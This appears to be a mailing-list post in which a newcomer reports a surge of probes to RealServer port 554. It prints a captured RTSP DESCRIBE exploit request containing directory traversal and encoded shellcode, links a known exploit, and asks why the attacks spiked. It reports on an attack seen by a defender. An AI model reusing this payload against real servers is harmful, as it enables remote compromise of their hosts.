Hi, I'm kinda new in this field so, please bear with me.
I've got a massive increase on connection requests to port 554 (RealServer) this
afternoon. I haven't given much thought about earlier connections but when
looking
through the firewall log I see that I've gotten a few in the past as well.
There is
however no doubt that the traffic has increased _greatly_ this afternoon.
(Almost)
every attempt are sent by a different address. I don't know if these are decoys
though.
I was curious about this so I opened the port up and ran
nc -l -p 554 > output
to see what the probes tried to send. What I got was definately an exploit
attempt.
DESCRIBE
/../../../../ÌÌ%eb%15%b9%8b%e6%13%41%81%f1%39%e6%13%41%5e%80%74%31%ff%9e%e2%f9%eb%05%e8%e6%ff%ff%ff%ad%45%fa%15%dd%ae%15%de%92%15%ee%82%33%15%e6%96%76%db%9e%9e%9e%cd%c8%15%c1%a2%15%c2%a5%e6%9d%41%cd%15%c5%be%9d%41%cd%1d%5d%9a%15%ad%9d%69%ad%57%32%ac%56%5f%5f%9b%1a%5e%eb%68%b5%54%eb%77%c6%b5%46%4f%75%c0%9d%c0%ba%9d%41%f8%15%95%15%c0%82%9d%41%15%9a%15%9d%59%c0%c5%61%7e%c0%f6%ad%ac%9e%9e%f6%e9%ed%ac%c1%ca%24%0c%f0%9a%1a%61%48%15%66%1f%72%9e%9c%9e%9e%15%72%cd%f4%9f%f4%9c%24%1d%cd%1d%9e%61%48%cd%cd%f6%4d%43%8d%24%f6%9c%9e%7e%ec%15%4a%15%46%f4%8e%cc%cd%24%fd%ae%fe%c4%61%48%ce%2a%9c%ce%cb%cd%24%9e%c6%fe%7c%61%48%21%a3%36%27%f3%61%7b.smi
RTSP/1.0
I removed a "few" /../..
Searching the web for this and found that this is an old exploit, most likely
this
one:
http://www.thc.org/exploits/THCrealbad.c
But that one is almost two years old, why does it show up this much now? So
suddenly.
It has only been going on for a few hours. Is there something new that has come
out
or is it just a coincidence?
Regards,
Stefan Pettersson
